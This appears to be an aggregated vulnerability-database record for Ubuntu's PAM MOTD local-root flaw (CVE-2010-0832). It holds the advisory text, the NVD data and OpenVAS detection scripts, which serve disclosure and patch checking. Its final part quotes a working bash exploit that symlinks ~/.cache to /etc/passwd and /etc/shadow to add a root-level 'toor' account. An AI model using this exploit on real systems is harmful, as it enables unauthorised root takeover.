ID USN-959-2Type ubuntuReporter UbuntuModified 2010-10-25T00:00:00
Description
USN-959-1 fixed vulnerabilities in PAM. This update provides the
Original advisory details:
Denis Excoffier discovered that the PAM MOTD module in Ubuntu did
{"id": "USN-959-2", "bulletinFamily": "unix", "title": "PAM vulnerability", "description": "USN-959-1 fixed vulnerabilities in PAM. This update provides the \ncorresponding updates for Ubuntu 10.10.\n\nOriginal advisory details:\n\nDenis Excoffier discovered that the PAM MOTD module in Ubuntu did \nnot correctly handle path permissions when creating user file stamps. \nA local attacker could exploit this to gain root privilieges.", "published": "2010-10-25T00:00:00", "modified": "2010-10-25T00:00:00", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://ubuntu.com/security/notices/USN-959-2", "reporter": "Ubuntu", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2010-0832"], "cvelist": ["CVE-2010-0832"], "type": "ubuntu", "lastseen": "2020-07-09T00:27:24", "edition": 5, "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2010-0832"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:24206", "SECURITYVULNS:VULN:10985"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310840458", "OPENVAS:840458", "OPENVAS:1361412562310840538", "OPENVAS:840538"]}, {"type": "exploitdb", "idList": ["EDB-ID:14339", "EDB-ID:14273"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:EE62C9975B1E24AB8BAD58349C1A39C5", "EXPLOITPACK:EF118B023807B3445EEE49C64BEE0398"]}, {"type": "seebug", "idList": ["SSV:69376", "SSV:19936"]}, {"type": "nessus", "idList": ["UBUNTU_USN-959-2.NASL", "UBUNTU_USN-959-1.NASL"]}, {"type": "ubuntu", "idList": ["USN-959-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:91613", "PACKETSTORM:91677"]}], "modified": "2020-07-09T00:27:24", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2020-07-09T00:27:24", "rev": 2}, "vulnersScore": 7.5}, "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "10.10", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "libpam-modules", "packageVersion": "1.1.1-4ubuntu2"}], "scheme": null}
{"cve": [{"lastseen": "2020-10-03T11:57:22", "description": "pam_motd (aka the MOTD module) in libpam-modules before 1.1.0-2ubuntu1.1 in PAM on Ubuntu 9.10 and libpam-modules before 1.1.1-2ubuntu5 in PAM on Ubuntu 10.04 LTS allows local users to change the ownership of arbitrary files via a symlink attack on .cache in a user's home directory, related to \"user file stamps\" and the motd.legal-notice file.", "edition": 3, "cvss3": {}, "published": "2010-07-12T16:30:00", "title": "CVE-2010-0832", "type": "cve", "cwe": ["CWE-59"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": true, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-0832"], "modified": "2017-08-17T01:32:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:9.10", "cpe:/o:canonical:ubuntu_linux:10.04"], "id": "CVE-2010-0832", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-0832", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:9.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:10.04:-:lts:*:*:*:*:*"]}], "ubuntu": [{"lastseen": "2020-07-09T00:25:38", "bulletinFamily": "unix", "cvelist": ["CVE-2010-0832"], "description": "Denis Excoffier discovered that the PAM MOTD module in Ubuntu did \nnot correctly handle path permissions when creating user file stamps. \nA local attacker could exploit this to gain root privilieges.", "edition": 5, "modified": "2010-07-07T00:00:00", "published": "2010-07-07T00:00:00", "id": "USN-959-1", "href": "https://ubuntu.com/security/notices/USN-959-1", "title": "PAM vulnerability", "type": "ubuntu", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2018-01-02T10:53:57", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0832"], "description": "Ubuntu Update for Linux kernel vulnerabilities USN-959-1", "modified": "2017-12-29T00:00:00", "published": "2010-07-12T00:00:00", "id": "OPENVAS:1361412562310840458", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310840458", "type": "openvas", "title": "Ubuntu Update for pam vulnerability USN-959-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_959_1.nasl 8258 2017-12-29 07:28:57Z teissa $\n#\n# Ubuntu Update for pam vulnerability USN-959-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Denis Excoffier discovered that the PAM MOTD module in Ubuntu did\n not correctly handle path permissions when creating user file stamps.\n A local attacker could exploit this to gain root privilieges.\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-959-1\";\ntag_affected = \"pam vulnerability on Ubuntu 9.10 ,\n Ubuntu 10.04 LTS\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-959-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.840458\");\n script_version(\"$Revision: 8258 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-29 08:28:57 +0100 (Fri, 29 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-07-12 11:56:20 +0200 (Mon, 12 Jul 2010)\");\n script_xref(name: \"USN\", value: \"959-1\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2010-0832\");\n script_name(\"Ubuntu Update for pam vulnerability USN-959-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU9.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libpam-cracklib\", ver:\"1.1.0-2ubuntu1.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpam-modules\", ver:\"1.1.0-2ubuntu1.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpam0g-dev\", ver:\"1.1.0-2ubuntu1.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpam0g\", ver:\"1.1.0-2ubuntu1.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpam-doc\", ver:\"1.1.0-2ubuntu1.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpam-runtime\", ver:\"1.1.0-2ubuntu1.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libpam-cracklib\", ver:\"1.1.1-2ubuntu5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpam-modules\", ver:\"1.1.1-2ubuntu5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpam0g-dev\", ver:\"1.1.1-2ubuntu5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpam0g\", ver:\"1.1.1-2ubuntu5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpam-doc\", ver:\"1.1.1-2ubuntu5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpam-runtime\", ver:\"1.1.1-2ubuntu5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-23T13:06:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0832"], "description": "Ubuntu Update for Linux kernel vulnerabilities USN-959-2", "modified": "2018-01-23T00:00:00", "published": "2010-11-23T00:00:00", "id": "OPENVAS:1361412562310840538", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310840538", "type": "openvas", "title": "Ubuntu Update for pam vulnerability USN-959-2", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_959_2.nasl 8495 2018-01-23 07:57:49Z teissa $\n#\n# Ubuntu Update for pam vulnerability USN-959-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"USN-959-1 fixed vulnerabilities in PAM. This update provides the\n corresponding updates for Ubuntu 10.10.\n\n Original advisory details:\n \n Denis Excoffier discovered that the PAM MOTD module in Ubuntu did\n not correctly handle path permissions when creating user file stamps.\n A local attacker could exploit this to gain root privilieges.\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-959-2\";\ntag_affected = \"pam vulnerability on Ubuntu 10.10\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-959-2/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.840538\");\n script_version(\"$Revision: 8495 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-23 08:57:49 +0100 (Tue, 23 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-11-23 15:30:07 +0100 (Tue, 23 Nov 2010)\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"USN\", value: \"959-2\");\n script_cve_id(\"CVE-2010-0832\");\n script_name(\"Ubuntu Update for pam vulnerability USN-959-2\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU10.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libpam-cracklib\", ver:\"1.1.1-4ubuntu2\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpam-modules\", ver:\"1.1.1-4ubuntu2\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpam0g-dev\", ver:\"1.1.1-4ubuntu2\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpam0g\", ver:\"1.1.1-4ubuntu2\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpam-doc\", ver:\"1.1.1-4ubuntu2\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpam-runtime\", ver:\"1.1.1-4ubuntu2\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-04T11:17:30", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0832"], "description": "Ubuntu Update for Linux kernel vulnerabilities USN-959-1", "modified": "2017-12-01T00:00:00", "published": "2010-07-12T00:00:00", "id": "OPENVAS:840458", "href": "http://plugins.openvas.org/nasl.php?oid=840458", "type": "openvas", "title": "Ubuntu Update for pam vulnerability USN-959-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_959_1.nasl 7965 2017-12-01 07:38:25Z santu $\n#\n# Ubuntu Update for pam vulnerability USN-959-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Denis Excoffier discovered that the PAM MOTD module in Ubuntu did\n not correctly handle path permissions when creating user file stamps.\n A local attacker could exploit this to gain root privilieges.\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-959-1\";\ntag_affected = \"pam vulnerability on Ubuntu 9.10 ,\n Ubuntu 10.04 LTS\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-959-1/\");\n script_id(840458);\n script_version(\"$Revision: 7965 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 08:38:25 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-07-12 11:56:20 +0200 (Mon, 12 Jul 2010)\");\n script_xref(name: \"USN\", value: \"959-1\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2010-0832\");\n script_name(\"Ubuntu Update for pam vulnerability USN-959-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU9.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libpam-cracklib\", ver:\"1.1.0-2ubuntu1.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpam-modules\", ver:\"1.1.0-2ubuntu1.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpam0g-dev\", ver:\"1.1.0-2ubuntu1.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpam0g\", ver:\"1.1.0-2ubuntu1.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpam-doc\", ver:\"1.1.0-2ubuntu1.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpam-runtime\", ver:\"1.1.0-2ubuntu1.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libpam-cracklib\", ver:\"1.1.1-2ubuntu5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpam-modules\", ver:\"1.1.1-2ubuntu5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpam0g-dev\", ver:\"1.1.1-2ubuntu5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpam0g\", ver:\"1.1.1-2ubuntu5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpam-doc\", ver:\"1.1.1-2ubuntu5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpam-runtime\", ver:\"1.1.1-2ubuntu5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-04T11:18:19", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0832"], "description": "Ubuntu Update for Linux kernel vulnerabilities USN-959-2", "modified": "2017-12-01T00:00:00", "published": "2010-11-23T00:00:00", "id": "OPENVAS:840538", "href": "http://plugins.openvas.org/nasl.php?oid=840538", "type": "openvas", "title": "Ubuntu Update for pam vulnerability USN-959-2", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_959_2.nasl 7965 2017-12-01 07:38:25Z santu $\n#\n# Ubuntu Update for pam vulnerability USN-959-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"USN-959-1 fixed vulnerabilities in PAM. This update provides the\n corresponding updates for Ubuntu 10.10.\n\n Original advisory details:\n \n Denis Excoffier discovered that the PAM MOTD module in Ubuntu did\n not correctly handle path permissions when creating user file stamps.\n A local attacker could exploit this to gain root privilieges.\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-959-2\";\ntag_affected = \"pam vulnerability on Ubuntu 10.10\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-959-2/\");\n script_id(840538);\n script_version(\"$Revision: 7965 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 08:38:25 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-11-23 15:30:07 +0100 (Tue, 23 Nov 2010)\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"USN\", value: \"959-2\");\n script_cve_id(\"CVE-2010-0832\");\n script_name(\"Ubuntu Update for pam vulnerability USN-959-2\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU10.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libpam-cracklib\", ver:\"1.1.1-4ubuntu2\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpam-modules\", ver:\"1.1.1-4ubuntu2\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpam0g-dev\", ver:\"1.1.1-4ubuntu2\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpam0g\", ver:\"1.1.1-4ubuntu2\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpam-doc\", ver:\"1.1.1-4ubuntu2\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpam-runtime\", ver:\"1.1.1-4ubuntu2\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:23:18", "description": "", "published": "2010-07-13T00:00:00", "type": "packetstorm", "title": "Ubuntu PAM MOTD Local Root", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-0832"], "modified": "2010-07-13T00:00:00", "id": "PACKETSTORM:91677", "href": "https://packetstormsecurity.com/files/91677/Ubuntu-PAM-MOTD-Local-Root.html", "sourceData": "`#!/bin/bash \n# \n# Exploit Title: Ubuntu PAM MOTD local root \n# Date: July 9, 2010 \n# Author: Anonymous \n# Software Link: http://packages.ubuntu.com/ \n# Version: pam-1.1.0 \n# Tested on: Ubuntu 9.10 (Karmic Koala), Ubuntu 10.04 LTS (Lucid Lynx) \n# CVE: CVE-2010-0832 \n# Patch Instructions: sudo aptitude -y update; sudo aptitude -y install libpam~n~i \n# References: http://www.exploit-db.com/exploits/14273/ by Kristian Erik Hermansen \n# \n# Local root by adding temporary user toor:toor with id 0 to /etc/passwd & /etc/shadow. \n# Does not prompt for login by creating temporary SSH key and authorized_keys entry. \n# \n# user@ubuntu:~$ bash ubuntu-pam-motd-localroot.sh \n# [*] Ubuntu PAM MOTD local root \n# [*] Backuped /home/user/.ssh/authorized_keys \n# [*] SSH key set up \n# [*] Backuped /home/user/.cache \n# [*] spawn ssh \n# [+] owned: /etc/passwd \n# [*] spawn ssh \n# [+] owned: /etc/shadow \n# [*] Restored /home/user/.cache \n# [*] Restored /home/user/.ssh/authorized_keys \n# [*] SSH key removed \n# [+] Success! Use password toor to get root \n# Password: \n# root@ubuntu:/home/user# id \n# uid=0(root) gid=0(root) groupes=0(root) \n# \nP='toor:x:0:0:root:/root:/bin/bash' \nS='toor:$6$tPuRrLW7$m0BvNoYS9FEF9/Lzv6PQospujOKt0giv.7JNGrCbWC1XdhmlbnTWLKyzHz.VZwCcEcYQU5q2DLX.cI7NQtsNz1:14798:0:99999:7:::' \necho \"[*] Ubuntu PAM MOTD local root\" \n[ -z \"$(which ssh)\" ] && echo \"[-] ssh is a requirement\" && exit 1 \n[ -z \"$(which ssh-keygen)\" ] && echo \"[-] ssh-keygen is a requirement\" && exit 1 \n[ -z \"$(ps -u root |grep sshd)\" ] && echo \"[-] a running sshd is a requirement\" && exit 1 \nbackup() { \n[ -e \"$1\" ] && [ -e \"$1\".bak ] && rm -rf \"$1\".bak \n[ -e \"$1\" ] || return 0 \nmv \"$1\"{,.bak} || return 1 \necho \"[*] Backuped $1\" \n} \nrestore() { \n[ -e \"$1\" ] && rm -rf \"$1\" \n[ -e \"$1\".bak ] || return 0 \nmv \"$1\"{.bak,} || return 1 \necho \"[*] Restored $1\" \n} \nkey_create() { \nbackup ~/.ssh/authorized_keys \nssh-keygen -q -t rsa -N '' -C 'pam' -f \"$KEY\" || return 1 \n[ ! -d ~/.ssh ] && { mkdir ~/.ssh || return 1; } \nmv \"$KEY.pub\" ~/.ssh/authorized_keys || return 1 \necho \"[*] SSH key set up\" \n} \nkey_remove() { \nrm -f \"$KEY\" \nrestore ~/.ssh/authorized_keys \necho \"[*] SSH key removed\" \n} \nown() { \n[ -e ~/.cache ] && rm -rf ~/.cache \nln -s \"$1\" ~/.cache || return 1 \necho \"[*] spawn ssh\" \nssh -o 'NoHostAuthenticationForLocalhost yes' -i \"$KEY\" localhost true \n[ -w \"$1\" ] || { echo \"[-] Own $1 failed\"; restore ~/.cache; bye; } \necho \"[+] owned: $1\" \n} \nbye() { \nkey_remove \nexit 1 \n} \nKEY=\"$(mktemp -u)\" \nkey_create || { echo \"[-] Failed to setup SSH key\"; exit 1; } \nbackup ~/.cache || { echo \"[-] Failed to backup ~/.cache\"; bye; } \nown /etc/passwd && echo \"$P\" >> /etc/passwd \nown /etc/shadow && echo 